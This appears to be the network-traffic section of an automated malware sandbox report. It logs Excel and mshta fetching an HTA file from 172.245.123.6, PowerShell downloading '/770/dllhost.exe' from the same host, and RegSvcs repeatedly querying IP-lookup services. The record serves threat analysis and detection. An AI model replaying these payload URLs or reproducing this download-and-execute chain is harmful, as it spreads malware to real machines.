                                                                                  Sep 30, 2024 10:13:05.812604904 CEST8.8.8.8192.168.2.220x9ee4No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:05.812604904 CEST8.8.8.8192.168.2.220x9ee4No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:05.812604904 CEST8.8.8.8192.168.2.220x9ee4No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:05.812604904 CEST8.8.8.8192.168.2.220x9ee4No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:05.812604904 CEST8.8.8.8192.168.2.220x9ee4No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:05.821012020 CEST8.8.8.8192.168.2.220x777dNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:05.821012020 CEST8.8.8.8192.168.2.220x777dNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:05.821012020 CEST8.8.8.8192.168.2.220x777dNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:05.821012020 CEST8.8.8.8192.168.2.220x777dNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:05.821012020 CEST8.8.8.8192.168.2.220x777dNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:05.821012020 CEST8.8.8.8192.168.2.220x777dNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:06.542923927 CEST8.8.8.8192.168.2.220x539No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:06.542923927 CEST8.8.8.8192.168.2.220x539No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:07.237760067 CEST8.8.8.8192.168.2.220x9649No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:07.237760067 CEST8.8.8.8192.168.2.220x9649No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:07.237760067 CEST8.8.8.8192.168.2.220x9649No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:07.237760067 CEST8.8.8.8192.168.2.220x9649No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:07.237760067 CEST8.8.8.8192.168.2.220x9649No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:07.237760067 CEST8.8.8.8192.168.2.220x9649No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:07.249471903 CEST8.8.8.8192.168.2.220x7837No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:07.249471903 CEST8.8.8.8192.168.2.220x7837No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:07.249471903 CEST8.8.8.8192.168.2.220x7837No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:07.249471903 CEST8.8.8.8192.168.2.220x7837No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:07.249471903 CEST8.8.8.8192.168.2.220x7837No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:07.249471903 CEST8.8.8.8192.168.2.220x7837No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:07.833839893 CEST8.8.8.8192.168.2.220xdfa2No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:07.833839893 CEST8.8.8.8192.168.2.220xdfa2No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:08.493590117 CEST8.8.8.8192.168.2.220xc9e2No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:08.493590117 CEST8.8.8.8192.168.2.220xc9e2No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:08.493590117 CEST8.8.8.8192.168.2.220xc9e2No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:08.493590117 CEST8.8.8.8192.168.2.220xc9e2No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:08.493590117 CEST8.8.8.8192.168.2.220xc9e2No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:08.493590117 CEST8.8.8.8192.168.2.220xc9e2No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:08.507678986 CEST8.8.8.8192.168.2.220xb24aNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:08.507678986 CEST8.8.8.8192.168.2.220xb24aNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:08.507678986 CEST8.8.8.8192.168.2.220xb24aNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:08.507678986 CEST8.8.8.8192.168.2.220xb24aNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:08.507678986 CEST8.8.8.8192.168.2.220xb24aNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:08.507678986 CEST8.8.8.8192.168.2.220xb24aNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:09.200356960 CEST8.8.8.8192.168.2.220x7a07No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:09.200356960 CEST8.8.8.8192.168.2.220x7a07No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:10.765104055 CEST8.8.8.8192.168.2.220xc01aNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:10.765104055 CEST8.8.8.8192.168.2.220xc01aNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:10.765104055 CEST8.8.8.8192.168.2.220xc01aNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:10.765104055 CEST8.8.8.8192.168.2.220xc01aNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:10.765104055 CEST8.8.8.8192.168.2.220xc01aNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:10.765104055 CEST8.8.8.8192.168.2.220xc01aNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:10.780044079 CEST8.8.8.8192.168.2.220xcd74No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:10.780044079 CEST8.8.8.8192.168.2.220xcd74No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:10.780044079 CEST8.8.8.8192.168.2.220xcd74No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:10.780044079 CEST8.8.8.8192.168.2.220xcd74No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:10.780044079 CEST8.8.8.8192.168.2.220xcd74No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:10.780044079 CEST8.8.8.8192.168.2.220xcd74No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:11.348995924 CEST8.8.8.8192.168.2.220x23acNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:11.348995924 CEST8.8.8.8192.168.2.220x23acNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                  • og1.in
                                                                                  • reallyfreegeoip.org
                                                                                  • 172.245.123.6
                                                                                  • checkip.dyndns.org
Session ID: 0 | Source IP: 192.168.2.22 | Source Port: 49164 | Destination IP: 172.245.123.6 | Destination Port: 80 | PID: 3344 | Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Timestamp: Sep 30, 2024 10:12:19.545196056 CEST | Bytes transferred: 360 | Direction: OUT | Data:
GET /xampp/crio/IEnetbokkworkingforupdate.hta HTTP/1.1
                                                                                  Accept: */*
                                                                                  UA-CPU: AMD64
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                  Host: 172.245.123.6
                                                                                  Connection: Keep-Alive
Timestamp: Sep 30, 2024 10:12:20.038341045 CEST | Bytes transferred: 1236 | Direction: IN | Data:
HTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Sep 2024 08:12:19 GMT
                                                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                  Last-Modified: Mon, 30 Sep 2024 01:35:50 GMT
                                                                                  ETag: "1ceb0-6234c398c9718"
                                                                                  Accept-Ranges: bytes
                                                                                  Content-Length: 118448
                                                                                  Keep-Alive: timeout=5, max=100
                                                                                  Connection: Keep-Alive
                                                                                  Content-Type: application/hta
                                                                                  Sep 30, 2024 10:12:20.038399935 CEST1236INData Raw: 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32
                                                                                  Data Ascii: 9%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252
                                                                                  Sep 30, 2024 10:12:20.038405895 CEST1236INData Raw: 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25
                                                                                  Data Ascii: 2509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25253A%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%
                                                                                  Sep 30, 2024 10:12:20.038413048 CEST1236INData Raw: 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35
                                                                                  Data Ascii: %252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%2525
                                                                                  Sep 30, 2024 10:12:20.043508053 CEST1236INData Raw: 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30
                                                                                  Data Ascii: 252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25250


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  1 | 192.168.2.22 | 49166 | 172.245.123.6 | 80 | 3624 | C:\Windows\System32\mshta.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Sep 30, 2024 10:12:22.235387087 CEST | 437 | OUT | GET /xampp/crio/IEnetbokkworkingforupdate.hta HTTP/1.1
                                                                                  Accept: */*
                                                                                  Accept-Language: en-US
                                                                                  UA-CPU: AMD64
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                  Range: bytes=8896-
                                                                                  Connection: Keep-Alive
                                                                                  Host: 172.245.123.6
                                                                                  If-Range: "1ceb0-6234c398c9718"
                                                                                  Sep 30, 2024 10:12:22.720527887 CEST | 1236 | IN | HTTP/1.1 206 Partial Content
                                                                                  Date: Mon, 30 Sep 2024 08:12:21 GMT
                                                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                  Last-Modified: Mon, 30 Sep 2024 01:35:50 GMT
                                                                                  ETag: "1ceb0-6234c398c9718"
                                                                                  Accept-Ranges: bytes
                                                                                  Content-Length: 109552
                                                                                  Content-Range: bytes 8896-118447/118448
                                                                                  Keep-Alive: timeout=5, max=100
                                                                                  Connection: Keep-Alive
                                                                                  Content-Type: application/hta


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  2 | 192.168.2.22 | 49167 | 172.245.123.6 | 80 | 3736 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Sep 30, 2024 10:12:30.933979988 CEST | 335 | OUT | GET /770/dllhost.exe HTTP/1.1
                                                                                  Accept: */*
                                                                                  UA-CPU: AMD64
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                  Host: 172.245.123.6
                                                                                  Connection: Keep-Alive
                                                                                  Sep 30, 2024 10:12:31.423973083 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Sep 2024 08:12:30 GMT
                                                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                  Last-Modified: Mon, 30 Sep 2024 05:51:09 GMT
                                                                                  ETag: "fb241-6234fca9f391a"
                                                                                  Accept-Ranges: bytes
                                                                                  Content-Length: 1028673
                                                                                  Keep-Alive: timeout=5, max=100
                                                                                  Connection: Keep-Alive
                                                                                  Content-Type: application/lnk


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  3 | 192.168.2.22 | 49172 | 172.245.123.6 | 80 | 3996 | C:\Windows\System32\mshta.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Sep 30, 2024 10:12:43.793008089 CEST | 472 | OUT | GET /xampp/crio/IEnetbokkworkingforupdate.hta HTTP/1.1
                                                                                  Accept: */*
                                                                                  Accept-Language: en-US
                                                                                  UA-CPU: AMD64
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                  If-Modified-Since: Mon, 30 Sep 2024 01:35:50 GMT
                                                                                  Connection: Keep-Alive
                                                                                  Host: 172.245.123.6
                                                                                  If-None-Match: "1ceb0-6234c398c9718"
                                                                                  Sep 30, 2024 10:12:44.169147968 CEST | 275 | IN | HTTP/1.1 304 Not Modified
                                                                                  Date: Mon, 30 Sep 2024 08:12:43 GMT
                                                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                  Last-Modified: Mon, 30 Sep 2024 01:35:50 GMT
                                                                                  ETag: "1ceb0-6234c398c9718"
                                                                                  Accept-Ranges: bytes
                                                                                  Keep-Alive: timeout=5, max=100
                                                                                  Connection: Keep-Alive


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  4 | 192.168.2.22 | 49173 | 193.122.130.0 | 80 | 3108 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Sep 30, 2024 10:12:46.688663006 CEST | 151 | OUT | GET / HTTP/1.1
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                  Host: checkip.dyndns.org
                                                                                  Connection: Keep-Alive
                                                                                  Sep 30, 2024 10:12:47.158879042 CEST | 320 | IN | HTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Sep 2024 08:12:47 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 103
                                                                                  Connection: keep-alive
                                                                                  Cache-Control: no-cache
                                                                                  Pragma: no-cache
                                                                                  X-Request-ID: f355aac84c90f7c51ab0b69d56d3c62c
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                                  Sep 30, 2024 10:12:47.368921995 CEST | 320 | IN | HTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Sep 2024 08:12:47 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 103
                                                                                  Connection: keep-alive
                                                                                  Cache-Control: no-cache
                                                                                  Pragma: no-cache
                                                                                  X-Request-ID: f355aac84c90f7c51ab0b69d56d3c62c
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                                  Sep 30, 2024 10:12:47.789362907 CEST | 127 | OUT | GET / HTTP/1.1
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                  Host: checkip.dyndns.org
                                                                                  Sep 30, 2024 10:12:47.902633905 CEST | 320 | IN | HTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Sep 2024 08:12:47 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 103
                                                                                  Connection: keep-alive
                                                                                  Cache-Control: no-cache
                                                                                  Pragma: no-cache
                                                                                  X-Request-ID: a500922a7b1264d5b50009795acd75e6
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                                  Sep 30, 2024 10:12:49.368849993 CEST | 127 | OUT | GET / HTTP/1.1
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                  Host: checkip.dyndns.org
                                                                                  Sep 30, 2024 10:12:49.472323895 CEST | 320 | IN | HTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Sep 2024 08:12:49 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 103
                                                                                  Connection: keep-alive
                                                                                  Cache-Control: no-cache
                                                                                  Pragma: no-cache
                                                                                  X-Request-ID: 2f279be893460547b44f4d65d7ff0361
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                                  Sep 30, 2024 10:12:49.716661930 CEST | 320 | IN | HTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Sep 2024 08:12:49 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 103
                                                                                  Connection: keep-alive
                                                                                  Cache-Control: no-cache
                                                                                  Pragma: no-cache
                                                                                  X-Request-ID: 2f279be893460547b44f4d65d7ff0361
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  5 | 192.168.2.22 | 49176 | 132.226.8.169 | 80 | 3108 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Sep 30, 2024 10:12:50.202388048 CEST | 127 | OUT | GET / HTTP/1.1
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                  Host: checkip.dyndns.org
                                                                                  Sep 30, 2024 10:12:51.348546028 CEST | 272 | IN | HTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Sep 2024 08:12:51 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 103
                                                                                  Connection: keep-alive
                                                                                  Cache-Control: no-cache
                                                                                  Pragma: no-cache
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  6 | 192.168.2.22 | 49178 | 132.226.247.73 | 80 | 3108 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Sep 30, 2024 10:12:52.019423008 CEST | 127 | OUT | GET / HTTP/1.1
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                  Host: checkip.dyndns.org
                                                                                  Sep 30, 2024 10:12:52.694926977 CEST | 320 | IN | HTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Sep 2024 08:12:52 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 103
                                                                                  Connection: keep-alive
                                                                                  Cache-Control: no-cache
                                                                                  Pragma: no-cache
                                                                                  X-Request-ID: dbb8b38f887e52174f67d83f666f4c38
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                                  Sep 30, 2024 10:12:52.904678106 CEST | 320 | IN | HTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Sep 2024 08:12:52 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 103
                                                                                  Connection: keep-alive
                                                                                  Cache-Control: no-cache
                                                                                  Pragma: no-cache
                                                                                  X-Request-ID: dbb8b38f887e52174f67d83f666f4c38
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  7 | 192.168.2.22 | 49180 | 193.122.130.0 | 80 | 3108 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Sep 30, 2024 10:12:53.454821110 CEST | 151 | OUT | GET / HTTP/1.1
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                  Host: checkip.dyndns.org
                                                                                  Connection: Keep-Alive
                                                                                  Sep 30, 2024 10:12:53.906809092 CEST | 320 | IN | HTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Sep 2024 08:12:53 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 103
                                                                                  Connection: keep-alive
                                                                                  Cache-Control: no-cache
                                                                                  Pragma: no-cache
                                                                                  X-Request-ID: eaefc4771e47cb4e5cb623f597a7e047
